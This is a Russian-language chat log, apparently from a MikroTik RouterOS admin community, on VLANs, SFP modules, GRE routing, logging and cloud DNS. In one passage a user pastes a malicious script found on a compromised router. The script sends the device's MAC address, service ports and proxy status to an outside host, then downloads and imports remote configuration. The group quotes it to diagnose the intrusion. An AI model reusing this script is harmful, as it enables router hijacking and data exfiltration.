странно.

где то читал про это, но это все не точно)))

)

ну

А на актуальных прошивках рос, всю работу с вланами теперь через бридж рекомендуется выполнять?

там конекторы тоже свои идут. Под более толстые жилы

А на актуальных прошивках рос, всю работу с вланами теперь через бридж рекомендуется выполнять?

хороший вопрос, я в сомнениях...

Подскажите, как исправить проблему, в логе видно только крайную операцию

вот это вызывает вопросы

Подскажите, как исправить проблему, в логе видно только крайную операцию

/system scripts export

/system scheduler export

/system scripts export

Был там один падла

:global mac [/interface ethernet get 1 mac-address] :global port ([/ip service get winbox port]."_".[/ip socks get port]."_".[/ip proxy get port]) :global info ([/ip socks get enabled]."_".[/ip proxy get enabled]."_".[/interface pptp-server server get enabled]) :global cmd "/$mac/$port/$info/dns" /tool fetch address=src-ip.com src-path=$cmd mode=http dst-path=dns;:delay 3s /import dns;:delay 4s;/file remove dns

/system log pri

[lebedev@MikroTik] > /system log pri Flags: X - disabled, I - invalid, * - default # TOPICS ACTION PREFIX 0 * info memory 1 * error memory 2 * warning memory 3 * critical echo

а что в шедулере?

а что в шедулере?

Пусто. Я удалил оттуда

поломали микрот и накуявертили прокси

Подскажите, как исправить проблему, в логе видно только крайную операцию

/system logging action set memory memory-lines=1000

/system logging action set memory memory-lines=1000

Спасибо

Народ подскажите кто ставил на rb2011 в sfp модуль - SFP WDM 1.25G Tx1310/Rx1550 3km SC DDM

Работает? Не надо костылять?

Народ подскажите кто ставил на rb2011 в sfp модуль - SFP WDM 1.25G Tx1310/Rx1550 3km SC DDM

По всем этим буквам не помню, но 1310/1550 ставили китайские какие-то, без проблем завелись.

Понятно спасибо

Народ подскажите кто ставил на rb2011 в sfp модуль - SFP WDM 1.25G Tx1310/Rx1550 3km SC DDM

а в чём проблема должна быть? даже вендор не указан

SSD связьстройдеталь, но они явно у китайцев выкупают

если модуль живой и соответствует скорости порта - некротик сожрёт всё

если модуль живой и соответствует скорости порта - некротик сожрёт всё

Супер буду пробовать

коллеги, добрый вечер. Обратилс ко мне коллега с проблемой IP туннеля, типа не работает , я ему посоветовал настроить GRE , помог , но вопрос в следующем, нет пингов в локалку . Убрал статические маршруты, поднял RIP , всё равно нет . С маршрутизаторов всё пингуется, а вот что за натом, уже нет . В маскараде интерфейс не указывали, в фаерволе все дропы отрублены, подскажите где копнуть ?

Добавить на обоих роутерах в начало списка правил /ip firewall mangle правило, логирующее icmp пакеты. Запустить пинг с компа в одной локалке на комп в другой. Поглядеть в логи.

Добавить на обоих роутерах в начало списка правил /ip firewall mangle правило, логирующее icmp пакеты. Запустить пинг с компа в одной локалке на комп в другой. Поглядеть в логи.

Как написать данное правило ? Никогда в мангле не делал так

Ну, не хотите в mangle, слелайте в filter. Только там обычно набито другими правилами, а в mangle посвободнее ?

Ну, не хотите в mangle, слелайте в filter. Только там обычно набито другими правилами, а в mangle посвободнее ?

А есть пример такого правила ?

кто знает в материнках MikroTik RBM33G и MikroTik RBM11G датчик напряжения и температуры есть?

в 11G нету

А чего там сложного? Обычное правило.

А чего там сложного? Обычное правило.

Ну вот к сожалению не доводилось писать правила которые логируют пинг

Они куда то же писаться должны , явно не в log

Тогда Вам стОит нанять сисадмина и продолжить настраивать 1С

Тогда Вам стОит нанять сисадмина и продолжить настраивать 1С

Ясно

в 11G нету

пипец очень печально , спасибо

Они куда то же писаться должны , явно не в log

Просто создаёте правило, в action=passthrough, и всё

счётчик срабатываний в винбоксе и покажет - есть попадания в условие, или нет

можно ли как-то заакцептить трафик в мангл и при это его промаркеровать для косов?

ну т.е. двумя правилами

акцептится в фаерволе

мангл - для пометки

есть действие пасру, его нужно активнее использовать, акцепты в нате или фильтрах

https://kb.vmware.com/s/article/1027511?CoveoV2.CoveoLightningApex.getInitializationData=1&ui-force-components-controllers-hostConfig.HostConfig.getConfigData=1&r=2&other.KM_Utility.getArticleDetails=1&other.KM_Utility.getArticleMetadata=1&other.KM_Utility.getUrl=1&other.KM_Utility.getUser=1&other.KM_Utility.getAllTranslatedLanguages=1&ui-comm-runtime-components-aura-components-siteforce-qb.Quarterback.validateRoute=1

вот такая прелесть с CHR

с какой целью тогда в мангл акцепт есть?

закончить путешествие по цепочкам

выйти из колеса Сансары

Коллеги, а как выключить облако микротика, чтоб днс имя не пингловалось? Галочку в ip-cloud снял, а все равно доступ остался.

галочка -это обновление на их клауде DNS-записи, скорее всего

сколько там TTL у неё, посмотрите

час

...

то есть пока ип не поменяетя - будет дотупен по имени?

если скрипт не обновит

да

пока A-запись не заэкспайрится

ну это в теории

а где запись удалить можно? в connections или где она висит?

не, это же на их сервере запись

интересно) в общем или ждать или менять принудительно ип?

ERROR: S client not available

а смысл?

в днс сервере их висит

2 недели

вас прям брутят по этому адресу/имени?

потом офф

лте модем

воткнули обновили

выкинули...

ну да. Или бесплатный ВПН какой-нибудь типа zoogvpn поднять на роутере

тоже вариант

так-то невелика беда, на мой взгляд

вас прям брутят по этому адресу/имени?

та нет, просто раньше пользовались, теперь статику сделали, нет смысла в нем

дык просто перестаньте беспокоиться, и всё)

так какая вам разница

та это понятно))

резолв не резолв

бог с ним

там имя такое, что реально адрес проще подобрать или запомнить

сервер был прокинут просто по этому адресу, теперь хочется чтоб перестал быть доступным по нему

выше озвученны варианты

ладно, будет ждать 2 недели)) спасибо за инфу

дело на 5 минут

Блин, журналюги попросыпались, что ли? Отовсюду про уязвимость микротиков и апрельские патчи

Блин, журналюги попросыпались, что ли? Отовсюду про уязвимость микротиков и апрельские патчи

просто конкуренты проплатили

D-Link? Тенда?

Блин, журналюги попросыпались, что ли? Отовсюду про уязвимость микротиков и апрельские патчи

Сиська распереживалась, что про###ла весь малый бизнес)

Сиська распереживалась, что про###ла весь малый бизнес)

как по мне там поезд уже уехал) и договять его без смысла

как по мне там поезд уже уехал) и договять его без смысла

Ну это по тебе, а сиська большая компания, неповоротливая, до них это только дошло.../))

Сиська со своими индусами уже и энтерпрайз помалу сливает. Вот вам 100 (СТО!) уязвимостей сисек только с начала сентября. Из них 10 - CRITICAL: https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=100#~Vulnerabilities

Сиська со своими индусами уже и энтерпрайз помалу сливает. Вот вам 100 (СТО!) уязвимостей сисек только с начала сентября. Из них 10 - CRITICAL: https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=100#~Vulnerabilities

Ееееее, скоро все на ipcop будем разруливать)))

да если бы routeros переписали на rust то уязвимостей (не логических) совсем бы не было

да если бы routeros переписали на rust то уязвимостей (не логических) совсем бы не было

куда куда переписать?